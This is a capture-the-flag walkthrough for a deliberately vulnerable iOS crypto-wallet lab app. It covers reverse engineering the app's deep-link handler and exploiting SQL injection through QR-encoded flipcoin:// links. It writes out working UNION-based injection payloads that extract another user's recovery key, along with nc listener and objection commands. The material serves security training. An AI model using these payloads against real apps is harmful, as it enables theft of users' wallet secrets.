Description: Welcome to the iOS Application Security Lab: SQL Injection Challenge. The challenge is centered around a fictious crypto currency flipcoin and its wallet Flipcoin Wallet. The Flipcoin wallet is an offline wallet giving users full ownership of their digital assets. The challenge highlights the potential entrypoints that can lead to further serious vulnerabilities including SQL injection. As an attacker, your aim is to craft an exploit that can be used to attack other users of the application.

Install an IPA file can be difficult.
So, for make it more easy, I made a YouTube video with the process using Sideloadly.
NOTE: If you have problems with the keyboard and UI (buttons) when you need to hide it on a physical device, you can fix this problem by using the KeyboardTools
by @CrazyMind90
found in the Sileo app store.
Once you have the app installed, let’s proceed with the challenge.
Unzip the .ipa
file and inside we can find the Info.plist
Here we can found an interesting info
This is an scheme (for DeepLinks), which is handled with flipcoin
Let’s explore some related methods in the binary file.
strings 'Flipcoin Wallet' | grep URL
We can see methods related to URL handling.
What’s is this?application:openURL:sourceApplication:annotation:
-> for < iOS 9application:openURL:options:
-> for > iOS 10
But since iOS 13 we use UISceneDelegate
Used in multi-windows apps, UIScene, where each “scene” handle URL events by separated.
Its used with universal links
It’s a recommended method in > iOS 13 for URL handling when app have many active scenes.
This replace application:openURL:options:
– scene
: Active scene where URL was opened.
– openURLContext
: A NSSet with open URLs.
Scene != Activity
- An Activity in Android is a full screen with its own lifecycle.
- A Scene in iOS is more flexible, it can represent a window, a tab, or a part of the UI in multi-window or multi-tasking apps.
Let’s use otool
for decompile the methods, and search for them
otool -tv 'Flipcoin Wallet' | grep openURL
0000000100018654 bl _$s15Flipcoin_Wallet13SceneDelegateC5scene_15openURLContextsySo7UISceneC_ShySo16UIOpenURLContextCGtF
Let’s stop in this method
Clearly this is a Swfit app
Here’s the structure
→ Refers to the SceneDelegate of the app (handles scenes in iOS 13+).scene_15openURLContexts
→ Indicates that it receives a UIScene and aNSSet<UIOpenURLContext>
, which is the method for handling deep links in SceneDelegate.So7UISceneC_ShySo16UIOpenURLContextCGtF
→ It is using an NSSet of UIOpenURLContext, which confirms that it handles URLs opened from external links.
An NSSet can be look as an simple set that we can see in python.
You can see more information about the method with
otool -tv 'Flipcoin Wallet' | grep -A 50 s15Flipcoin_Wallet13SceneDelegateC5scene_15openURLContextsySo7UISceneC_ShySo16UIOpenURLContextCGtFTo
00000001000185f0 sub sp, sp, #0x50
00000001000185f4 stp x20, x19, [sp, #0x30]
00000001000185f8 stp x29, x30, [sp, #0x40]
00000001000185fc add x29, sp, #0x40
0000000100018600 mov x20, x0
0000000100018604 str x20, [sp, #0x20]
0000000100018608 mov x0, x2
000000010001860c stur x0, [x29, #-0x18]
0000000100018610 str x3, [sp, #0x18]
0000000100018614 bl 0x1000201fc ; symbol stub for: _objc_retain
0000000100018618 ldr x0, [sp, #0x18]
000000010001861c bl 0x1000201fc ; symbol stub for: _objc_retain
0000000100018620 mov x0, x20
0000000100018624 bl 0x1000201fc ; symbol stub for: _objc_retain
0000000100018628 mov x0, #0x0
000000010001862c bl _$sSo16UIOpenURLContextCMa
0000000100018630 str x0, [sp, #0x8]
0000000100018634 bl _$sSo16UIOpenURLContextCSo8NSObjectCSH10ObjectiveCWl
0000000100018638 ldr x1, [sp, #0x8]
000000010001863c mov x2, x0
0000000100018640 ldr x0, [sp, #0x18]
0000000100018644 bl 0x100020184 ; symbol stub for: _$sSh10FoundationE36_unconditionallyBridgeFromObjectiveCyShyxGSo5NSSetCSgFZ
0000000100018648 mov x1, x0
000000010001864c ldur x0, [x29, #-0x18]
0000000100018650 str x1, [sp, #0x10]
0000000100018654 bl _$s15Flipcoin_Wallet13SceneDelegateC5scene_15openURLContextsySo7UISceneC_ShySo16UIOpenURLContextCGtF
0000000100018658 ldr x0, [sp, #0x10]
000000010001865c bl 0x100020628 ; symbol stub for: _swift_bridgeObjectRelease
0000000100018660 ldr x0, [sp, #0x18]
0000000100018664 bl 0x1000201e4 ; symbol stub for: _objc_release
0000000100018668 ldr x0, [sp, #0x20]
000000010001866c bl 0x1000201e4 ; symbol stub for: _objc_release
0000000100018670 ldur x0, [x29, #-0x18]
0000000100018674 bl 0x1000201e4 ; symbol stub for: _objc_release
0000000100018678 ldp x29, x30, [sp, #0x40]
000000010001867c ldp x20, x19, [sp, #0x30]
0000000100018680 add sp, sp, #0x50
0000000100018684 ret
Now we need know how this method works, for that, we need use Ghidra.
Load the binary file and let’s search for the method!

This is an insane method which contains > 1000 code lines.
Searching in the C code, we can notice something interesting.
else {
local_438[5] = local_438[5] + 1;
local_6b8 = &PTR_s_v24@0:8@"UIScene"16_10002d000;
UVar14.unknown = local_4d8;
_objc_msgSend(local_4d8, "URL");
local_6d0 = UVar14.unknown;
(*local_4c8)(UVar16.unknown, local_2d8, local_380);
SVar36 = Foundation::URL::get_absoluteString(UVar16);
pSVar6 = local_440;
local_6d8 = SVar36.bridgeObject;
local_6e8 = SVar36.str;
(*local_4c0)(local_350, local_380);
(*local_4c0)(local_2d8, local_380);
local_6ac = 1;
SVar36 = Swift::String::init("amount", 6, 1);
local_6e0 = SVar36.bridgeObject;
pcVar32 = local_6e8;
pvVar24 = local_6d8;
(**(code **)((*(uint *)pSVar6 & *local_428) + 0x98))(local_6e8, local_6d8, SVar36.str);
UVar16.unknown = local_350;
local_6c8 = pcVar32;
local_6c0 = pvVar24;
local_108 = local_6c8;
local_100 = local_6c0;
UVar14.unknown = local_4d8;
_objc_msgSend(local_4d8, local_6b8[0x39]);
local_690 = UVar14.unknown;
(*local_4c8)(UVar16.unknown, local_2d8, local_380);
SVar36 = Foundation::URL::get_absoluteString(UVar16);
pSVar6 = local_440;
local_698 = SVar36.bridgeObject;
local_6a8 = SVar36.str;
(*local_4c0)(local_350, local_380);
(*local_4c0)(local_2d8, local_380);
SVar36 = Swift::String::init("testnet", 7, (byte)local_6ac & 1);
pcVar32 = (char *)SVar36.bridgeObject;
pcVar20 = local_6a8;
pvVar24 = local_698;
local_6a0 = pcVar32;
(**(code **)((*(uint *)pSVar6 & *local_428) + 0x98))(local_6a8, local_698, SVar36.str);
local_688 = pcVar20;
local_680 = pvVar24;
local_128 = local_688;
local_120 = local_680;
if (local_680 == (void *)0x0) {
= ___profc_/Users/BH32SJ/Downloads/flipcoin-wallet-main/challenge/Flipcoin_Wallet/SceneDelegate.swift:$s15Flipcoin_Wallet13SceneDelegateC5scene_15openURLContextsySo7UISceneC_ShySo16UIOpenURLContextCGtFSSyKXEfu0_
+ 1;
local_118 = Swift::String::init("", 0x1a, 1);
This code (can be seen at the end of the fragment) correspond to SceneDelegate.swift
This file in an iOS app define how app handle multiple windows (scenes).
- Manages the life cycle of the scene (window)
- Responds to events such as opening URLs, restoring app state, or handling external connections
- Runs together with
, but handles each “scene” individually
We can interpret the code in few words:
- Extracts the URL from the
- Gets the value of certain parameters, such as
, from the URL. - Validates if
is present, and if not, allocates as fallback - Frees objects in memory to avoid leaks
If we go to Receive functionality in app, we can see that a QR code is generated.
Also, in Send functionality, we can notice that our wallet is0x252B2Fff0d264d946n1004E581bb0a46175DC009
The deeplink looks like
Let’s generate an QR code with qrencode tool.
qrencode "flipcoin://0x252B2Fff0d264d946n1004E581bb0a46175DC009?amount=0.0001&testnet=" -o QR.png
Then, use nc tool for receive the incoming connections
nc -nlv 8081
If we scan the QR code, we can see this request
Content-Type: application/json
Connection: keep-alive
Accept: application/json
User-Agent: Flipcoin%20Wallet/1 CFNetwork/1410.1 Darwin/22.6.0
Content-Length: 175
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
"jsonrpc": "2.0",
"method": "web3_sha3",
"params": [
"id": 1
Is interesting that we have the ID param. So, let’s inspect the database implementation (due to this is an SQLi challenge).
Well, searching code about the DB implementation, I get the flag

In the createWallet
(bool __thiscall Flipcoin_Wallet::DatabaseHelper::createWallets(DatabaseHelper *this)
But, we need exploit the SQLi, so, we need know where and how the .sqlite
file is create.
So, we can use objection tool.
Attach your device via USB and while app is running, execute
objection -g "Flipcoin Wallet" explore
Then, with env
command you will get all dir
of the app.
Name Path
----------------- ---------------------------------------------------------------------------------------------------
BundlePath /private/var/containers/Bundle/Application/0EE311ED-CAC1-4CF6-AF6E-CFE426AC0812/Flipcoin
CachesDirectory /var/mobile/Containers/Data/Application/813E5422-D8C7-41EF-B7C3-BD53ED85D01C/Library/Caches
DocumentDirectory /var/mobile/Containers/Data/Application/813E5422-D8C7-41EF-B7C3-BD53ED85D01C/Documents
LibraryDirectory /var/mobile/Containers/Data/Application/813E5422-D8C7-41EF-B7C3-BD53ED85D01C/Library
Inside of Documents folder, we can found the .sqlite
...ab.Flipcoin-Wallet6.YX4C7J2RLK on (iPhone: 16.7.10) [usb] # ls
NSFileType Perms NSFileProtection Read Write Owner Group Size Creation Name
---------- ----- ------------------------------------ ---- ----- ------------ ------------ -------- ------------------------- -------------------------
Regular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 12.0 KiB 2025-02-08 19:22:17 +0000 your_database_name.sqlite
Readable: True Writable: True
We can download the database with this objection commnad
file download your_database_name.sqlite
Then, inspect the database scheme
sqlite3 your_database_name.sqlite
SQLite version 3.43.2 2023-10-10 13:08:14
Enter ".help" for usage hints.
sqlite> .headers on
sqlite> .tables
sqlite> select * from wallet;
We can see that we have id
, address
, currency
, amount
, recovery_key
I think that the sqli is in the amount param.
So, let’s try generate a new QR for test it.
qrencode "flipcoin://0x252B2Fff0d264d946n1004E581bb0a46175DC009?amount=0.0001/**/AND/**/id=2;--&testnet=" -o QR3.png
Remember set nc listener.
Content-Type: application/json
Connection: keep-alive
Accept: application/json
User-Agent: Flipcoin%20Wallet/1 CFNetwork/1410.1 Darwin/22.6.0
Content-Length: 166
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
"jsonrpc": "2.0",
"method": "web3_sha3",
"params": [
"id": 1
The SQLi works! because we get different wallet params.
So, after many tries, this UNION Based payload works
qrencode "flipcoin://0x252B2Fff0d264d946n1004E581bb0a46175DC009?amount=0.0001/**/AND/**/id=10/**/UNION/**/SELECT/**/10,(SELECT/**/recovery_key/**/FROM/**/wallet/**/WHERE/**/id=2),3,4,5/**/LIMIT/**/1;--&testnet=" -o QR6.png
We receive
Content-Type: application/json
Connection: keep-alive
Accept: application/json
User-Agent: Flipcoin%20Wallet/1 CFNetwork/1410.1 Darwin/22.6.0
Content-Length: 159
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate
"jsonrpc": "2.0",
"method": "web3_sha3",
"params": [
"id": 1
We get successfully the recovery_key of the account 2!BATTLE TOADS WRITING POEMS
Also, if you want get the ‘flag‘ you just need change the WHERE
id=2 by id=1.
I hope you found it useful (:
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